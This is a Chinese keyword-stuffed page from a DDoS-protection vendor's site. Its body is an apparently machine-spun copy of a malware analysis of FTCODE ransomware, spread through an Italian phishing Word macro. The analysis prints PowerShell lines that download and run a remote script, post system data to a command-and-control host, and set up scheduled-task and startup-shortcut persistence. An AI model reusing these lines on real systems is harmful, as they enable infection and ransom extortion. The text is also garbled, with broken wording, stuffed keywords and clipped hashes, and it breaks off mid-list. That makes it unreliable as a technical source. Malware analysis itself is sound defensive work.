cc防护_海外行动高_如何防-墨者安全-墨者盾
DDOS防御_CC防护_高防CDN服务器_【墨者安全】—墨者盾墨者盾—你的网站贴身保镖!

QQ:800185041
高防免费接入:400-0797-119

渠道合作:156 2527 6999

主页 > CC防火墙 > cc防护_海外行动高_如何防

cc防护_海外行动高_如何防

小墨安全管家 2021-05-02 22:36 CC防火墙 89 ℃
DDoS防御
2019年10月,我们遇到了一具网络钓鱼活动,该活动提供了一具恶意的Microsoft Word文档,该文档以扭曲的方式分发勒索软件。不像大多数勒索软件家族,如GandCrab,WannaCry和RobinHood,恶意软件不是编译代码。相反,它是用PowerShell(一种解释语言)编写的,在内存中运行,而不直截了当存储在磁盘上。这种内存威胁有时被称为"无文件"威胁。今年早些时候,微软公布了一具无文件威胁分类法,我们发觉这对内存恶意软件的分类特别实用。例如,那个勒索软件样本属于该分类的第二类,DDoS防御,因为恶意软件间接依靠于存储在磁盘。这个恶意软件经过在内存中启动远程托管的PowerShell足本来加密具有随机文件扩展名的文件。它经过在用户的启动名目中创建一具快捷方式(LNK)文件,在每次启动后运行VBScript下载器,从而在受感染的系统上建立持久性。VBScript是JasperLoader的一具变体(version=1006.1),JasperLoader是一种用于下载和运行勒索软件的轻量级加载程序。勒索软件是FTCODE的一具变体(version=1008.1),以文件扩展名命名,勒索软件用来重命名先前加密的文件版本。后续2019年,针对巴尔的摩和湖城等美国都市的勒索软件攻击事件接二连三,有关组织支付赎金的高调报道,以及甘地克拉布背后这个自称成功的组织,DDoS防御,勒索软件的生意并没有消逝的迹象离开。依照在2019年10月2日公布的联邦调查局公告中,"勒索软件攻击正变得更有针对性、更复杂、成本更高,虽然总体攻击频率保持一致。2018年初以来,广泛、不加区分的勒索软件活动的发生率大幅下落,但勒索软件攻击造成的损失却显著增加。"勒索软件打算被宣传为一种在地下论坛轻松、低风险的赚钞票方式。我们最近对于Buran勒索软件的帖子探讨了勒索软件即服务打算是怎么运作的。以Buran为例,它的开辟者讲他们将从任何赎金中减价25%,以换取一具用来解密受害者的"解码器"文件。在这篇博文,我们分析了那个基于足本的勒索软件所使用的技术,以保持低占用空间和幸免传统安全检测控件.File信息文件名:Fattura-2019-864819.doc文件大小:3 MB(3145729字节)分类:文档-Word.Downloader.CvuMD5:6EC76CEFB9C668F92F0594CA456F522SHA1:0270F80230258CDA5317C18BD00C4F32EAC4857FSHA256:20C54E830B2C177ED994E6E1FA7D8D4D6458B5AED9989AEC2AFE7BF867C41B5 3 MB有啥非常之处?大多数microsoftword下载程序都特别小,然而那个示例在文件大小方面是一具异常值。在十六进制编辑器中打开文件特别快解释了文件大的缘由。我们发觉文档中填充了空字节,文档中故意义的内容实际上惟独76KB。填充大概是一种经过添加或删除尾部null来为每个恶意文档生成不同哈希的想法字节。MicrosoftWord Downloader勒索软件是作为网络钓鱼活动的一部分而到达的,它传递了一具恶意的Word文档(.doc)。图1–用于诱骗用户单击"启用"的意大利语文档模板"内容"按钮。这个用于发送勒索软件的网络钓鱼文件是用意大利语编写的,这表明这场活动针对的是意大利语使用者。恶意参与者试图经过声称存在咨询题来欺骗用户单击"启用内容并启用编辑"功能区文件。图2–文档的翻译内容,诱使用户单击"启用内容并启用编辑"ribbon.Document_打开宏此活动中的Microsoft Word文档包含受密码爱护的Visual Basic for Applications(VBA)文档"打开"宏。顾名思义,这种类型的宏在每次打开文档时都会运行。我们能够使用olevba.py从文档中提取VBA代码的工具。Document_Open子例程调用一具名为sisfy的函数,该函数经过调用另一具函数cftbd来构建PowerShell命令。此函数用于将98加到作为参数传递的十进制数中,CC防御,并将结果转换为ASCII字符。cftbd函数被调用的次数来构建PowerShell命令。图3–嵌入到文档。单击"启用内容"将导致宏的执行。宏使用.NET程序集模块运行远程PowerShell命令,Net.WebClient. 它使用DownloadString想法从远程服务器()下载足本。足本使用Invoke-Expression cmdlet的"iex"别名在内存中运行。In还提供了两个查询字符串"need"和"vid",它们指定所需的有效载荷。图4–用于启动调用远程的PowerShell命令的捕获跟踪足本。这个远程PowerShell足本是勒索软件,包含加密文件和在受感染系统上持久化的逻辑。它包含以下内容功能。助手函数persistence勒索软件经过打算任务和在启动文件夹中创建LNK文件来建立持久性。名为uztcgeyhu的函数从另一具URL下载远程字符串(hxxp://mario.neonhcm[.]通信/?need=aegzfej&vid=dpec2&)并将其保存为WindowsIndexingService.vbs在C:\Users\Public\Libraries.$ufihvew=Join Path$tabxszsv(get random-minimum 100-maximum 999999)中,变量$ufihvew生成一具介于100和999999之间的随机数,并将其与路径连接$环境:公共\图书馆。在那个示例中,它创建路径C:\Users\Public\Libraries\770527$sjfaagvzy.DownloadString("hxxp://mario.neonhcm[.]通信/?need=aegzfej&vid=dpec2&")输出文件$ufihvew;变量$sjfaagvzy是PowerShell类的一具对象System.Net.WebClient接着调用DownloadString想法将数据下载到存储在$ufihvew.之后保存文件,勒索软件对内容的路径和大小执行验证检查,以确保内容大于5 KB。假如成功,它将770527复制到C:\Users\Public\Libraries\WindowsIndexingService.vbs.$uxsdcha=(schtasks.exe文件/create/TN"WindowsApplicationService"/sc DAILY/st 00:00/f/RI 20/du 23:59/TR$jgyijdfsg),接着创建一具名为WindowsApplicationService的打算任务,该任务运行WindowsIndexingService.vbs. 打算任务配置为每天00:00每20分钟运行一次,持续23小时59秒几分钟后勒索软件接着创建一具快捷方式文件WindowsApplicationService.lnk它将目标设置为C:\Users\Public\Libraries\WindowsIndexingService.vbs. 快捷方式的描述是"Windows应用服务"。图5–函数uztcgeyhu在启动文件夹中创建一具打算任务和.lnk文件坚持。沟通经过指挥与操纵(C2)服务器,勒索软件与C2服务器通信,正在发送有关系统的信息并检索要作为响应运行的命令。$gsvgdcw=$sjfaagvzy.UploadString( "hxxp://connect.hireguards[.]com/",("ver=1008.1&vid=dpec2&"+$wdgvgvthgv));函数zvbtfyajj使用System.Net.WebClient连接指挥操纵服务器hxxp://connect.hireguards[通信]。httppost请求以名为"version"和"vid"的查询字符串形式发送数据以及传递给函数的参数。接着,该函数将响应数据与字符串("ok")举行比较,并返回true和false所以,图6–zvbtfyajj功能与指挥操纵服务器通信命令.EncryptorThe勒索软件使用Rijndael算法加密文件。它使用.NET类System.Security.加密.RijndaelManaged创建一具RijndaelManaged对象。它用初始化向量(IV)、键、填充和模式初始化对象$iecstygcb.IV标准=(新对象Security.Cryptography.sha1治理).ComputeHash([文本。编码]:UTF8.GetBytes($wevhgux))[0..15];IV来自硬编码字符串"BXCODE INIT"。它首先使用.NET类的ComputeHash想法计算UTF-8编码字符串的哈希Security.Cryptography.sha1治理. SHA1Managed算法的哈希大小为160位。接着将前16位指定为四、 在加密密钥来自密钥salt,即硬编码字符串"BXCODE hack your system"和一具随机密码。$jagcwjyiy=get random-count 50-input(48..57+65..90+97..122)| foreach object-begin{$pass=$null}-process{$pass+=[char]$\}-end{$pass};变量$jagcwjyiy生成密钥的密码。它使用getrandom cmdlet为给定的输入数字48到57、65到90和97到122生成50个随机数。接着将这些数字转换成字符,DDoS防御,生成一具50个字符长的字符串$iecstygcb.键=(新对象Security.Cryptography.PasswordDeriveBytes$tbwtcvjh,$ywzvjthf,"SHA1",5).GetBytes(32);为了导出加密密钥,勒索软件使用.NET类Security.Cryptography.PasswordDeriveBytes有密码,钥匙盐,哈希算法(SHA1)和迭代次数(5)作为参数。接着将输出的32个字节设置为加密密钥。勒索软件将"零"填充模式和密码块链接(CBC)设置为RijndaelManaged对象中对称算法的密码模式。$ifuhfefwv=new objectSecurity.Cryptography.CryptoStream$cgzctus,$baitgbth,"写入";一旦加密机预备好,它使用.NET类Security.Cryptography.CryptoStream将文件中的任何给定字节转换为加密内存流。图7–加密器助手功能。启动命令使用命令Shell(命令提示符)勒索软件使用wydyax函数在系统上执行命令。命令经过命令行.exe使用Start-process cmdlet创建的进程。那个命令行.exe进程是用躲藏窗口参数"/c"创建的。图8–关心函数使用cmd.exe.File文件处理器:勒索软件的主模块名为gwytattut的函数是勒索软件的文件处理模块,它执行以下操作

cc防护_海外行动高_如何防


DDoS防御

当前位置:主页 > CC防火墙 > cc防护_海外行动高_如何防

标签列表
DDoS防御
网站分类
X
 

QQ客服

400-0797-119